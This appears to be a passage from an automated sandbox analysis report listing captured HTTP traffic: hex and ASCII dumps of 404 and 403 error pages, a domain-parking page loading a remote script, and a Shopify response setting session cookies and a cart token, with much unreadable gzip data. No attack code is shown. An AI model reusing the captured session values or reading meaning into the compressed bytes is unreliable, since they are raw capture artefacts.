61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:40:30 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 18 Feb 2022 06:24:03 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 358Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 5d 17 eb 38 6d 60 1f e1 77 ff e7 0b 63 0d 17 d5 47 02 00 00 Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;|9p:dbOgz#I>6u(~}y|z_o$r*W?d,!*ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:40:34 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 18 Feb 2022 06:24:03 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:40:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 315X-Sorting-Hat-ShopId: 71134478652Vary: Accept-EncodingVary: AcceptX-Frame-Options: DENYX-ShopId: 71134478652X-ShardId: 315X-Shopify-Generated-Cart-Token: 21c7ae2ca548800573490a93ab93ff69Content-Language: pt-BRCache-Control: no-storeSet-Cookie: localization=BR; path=/; expires=Tue, 30 Jan 2024 12:40:48 GMT; SameSite=LaxSet-Cookie: cart_sig=3daa84b1ccd12f91044bf3d820ae05bb; path=/; expires=Mon, 13 Feb 2023 12:40:48 GMT; HttpOnly; SameSite=LaxSet-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22BR%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=yeah-go.com; path=/; expires=Tue, 31 Jan 2023 12:40:48 GMT; SameSite=LaxSet-Cookie: _y=4b96e5d2-3055-4f89-a324-3dc0f29e3023; Expires=Tue, 30-Jan-24 12:40:48 GMT; Domain=yeah-go.com; Path=/; SameSite=LaxSet-Cookie: _s=6d163f85-2949-4a42-b4ce-e10617e163d7; Expires=Mon, 30-Jan-23 13:10:48 GMT; Domain=yeah-go.com; Path=/; SameSite=LaxSet-Cookie: _shopify_y=4b96e5d2-3055-4f89-a324-3dc0f29e3023; Expires=Tue, 30-Jan-24 12Data Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 30 Jan 2023 12:40:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 315X-Sorting-Hat-ShopId: 71134478652X-Dc: gcp-europe-west3X-Request-ID: aca3630a-5f6f-4e43-87f3-b653ec267e18X-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wvle4kgU20ZKzDTCZqnGDCg84KaskuIHELm853b%2FgasafBl0arBl%2FEvQXlSfKid125VO3dam81P%2B4h%2BU%2B9doD56%2BtDqU3pv4DJqkUuD6M0tOjSjy7t19uWYDuv1mXzEFCg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=69.000006Server: cloudflareCF-RAY: 791a47497b3f6933-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:40:57 GMTServer: Apache/2.4.54 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:41:00 GMTServer: Apache/2.4.54 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:41:06 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:41:08 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 30 Jan 2023 12:41:14 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 30 Jan 2023 12:41:16 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://lakeviewautomation.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 30 Jan 2023 12:41:24 GMTserver: LiteSpeedData Raw: 31 36 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5c 6d 73 db b6 b2 fe 5c ff 0a 44 9a da 62 0a d2 24 f5 6a 2a 4a 6f 9b 34 73 3f f4 dc 76 4e db 3b 73 27 c9 74 20 12 92 d0 50 24 0f 08 59 72 54 fd f7 3b 0b 80 af a2 5e 2c b9 d5 b4 b5 80 dd 67 17 c0 02 bb 58 ac fd e6 d5 fb 5f de fd fe 7f bf fe 84 16 62 19 be bd 79 03 ff 43 21 89 e6 93 16 8d cc 3f 7e 6b 41 1b 25 c1 db 9b 6f de 2c a9 20 c8 5f 10 9e 52 31 69 fd f1 fb 07 73 d4 42 f7 79 4f 44 96 74 d2 7a 64 74 9d c4 5c b4 90 1f 47 82 46 62 d2 5a b3 40 2c 26 01 7d 64 3e 35 e5 17 8c 58 c4 04 23 a1 99 fa 24 a4 13 47 e2 28 01 12 e6 8e c7 d3 58 a4 77 39 c8 dd 92 6c 4c b6 24 73 6a 26 9c 82 10 2f 24 7c 4e ef 40 81 37 82 89 90 be fd 95 cc 29 8a 62 81 66 f1 2a 0a d0 6d 7b e4 3a ce 18 fd 4c be 50 f4 bf 8c ae d1 0f 2b 11 2f 09 11 2c 8e de dc 2b 9e 9b 37 21 8b be 20 4e c3 c9 5d 10 a5 00 3e a3 c2 5f dc a1 05 a7 b3 c9 dd fd 7d 48 be 48 79 44 32 03 af e5 c7 4b 25 37 e7 6d 91 50 50 1e 11 41 5b 48 3c 25 74 d2 22 49 12 32 5f ca ba e7 69 fa dd 66 19 b6 90 94 39 69 35 6a 84 6e 39 f9 cf 2a 1e a3 0f 94 06 2d 25 be b5 10 22 49 bd 43 4a dc cf 28 0d ee d5 dc fd 23 aa bc 8b 97 4b 1a 89 f4 39 3a f9 9a a7 ac 5c ea 73 96 88 b7 37 6b 16 05 f1 da fa 73 9d d0 65 fc 17 fb 8d 0a c1 a2 79 8a 26 68 db 9a 92 94 fe c1 c3 96 a7 07 fd e9 fe d3 7d 6a ad ad 98 cf 3f dd cb 95 4f 3f dd fb 31 a7 9f ee 25 f3 a7 7b a7 67 d9 96 fd e9 7e e8 6e 86 ee a7 fb 16 6e d1 8d 68 79 2d 2b 89 e6 2d dc 4a 1f e7 97 e1 a5 8f 73 89 96 3e ce 7f 52 80 e9 a3 04 8c 57 dc a7 2d 6f db f2 e3 c8 27 42 aa a1 f5 f5 40 dd 66 53 f9 74 bf 4e 4c 16 f9 e1 2a a0 e9 a7 fb bf 52 d9 20 99 4d 4e 43 4a 52 6a 2d 59 64 fd 95 7e ff 48 f9 64 60 39 96 d3 da ed c6 37 f7 af 5f a1 df 17 2c 45 33 16 52 c4 52 04 26 68 ce 69 44 39 11 34 40 af ef 6f 5e cd 56 91 0f 36 d9 a1 98 60 61 6c 1f 09 47 11 e6 38 c6 6c 42 2c 9f 53 22 e8 4f 21 85 55 ec b4 7c 12 3d 92 b4 65 e0 64 c2 ac 39 15 ef 60 87 6e c4 ed 6d f9 5b a7 e5 06 2d 63 9c 01 